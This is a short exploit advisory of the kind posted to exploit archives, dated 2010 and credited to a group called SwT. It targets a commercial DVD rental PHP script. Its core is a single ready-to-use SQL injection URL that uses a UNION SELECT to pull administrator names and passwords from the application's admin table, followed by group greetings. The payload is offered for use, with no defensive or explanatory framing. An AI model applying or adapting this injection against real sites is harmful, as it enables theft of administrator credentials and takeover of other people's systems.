27 lines
No EOL
725 B
Text
27 lines
No EOL
725 B
Text
# Exploit Title: DVD Rental Software SQL injection Vulnerability
|
|
# Date: 19/11/2010
|
|
# Author: JaMbA
|
|
# Team: SwT
|
|
#Script url: http://www.commodityrentals.com/dvd.php
|
|
# Version: N/A
|
|
# Tested on: Demo
|
|
# CVE : ()
|
|
###################################################################################
|
|
|
|
|
|
|
|
#########################[ EXPL0!T ]#########################
|
|
|
|
|
|
http://server/path/index.php?view=catalog&item_type=M&cat_id=-18+union+select+1,2,concat(admin_name,0x3a,admin_password),4,5+from+rental_admin--
|
|
|
|
|
|
|
|
#############################SwT 4
|
|
Ever##############################################
|
|
|
|
|
|
GreeTz: SwT Member - ZaTTalova - Med Amine SaSsi - Raouf Matmati - Rami Bof
|
|
- Mr adnen smii - Mr zied becher
|
|
|
|
Dj Dj City Up Up :) |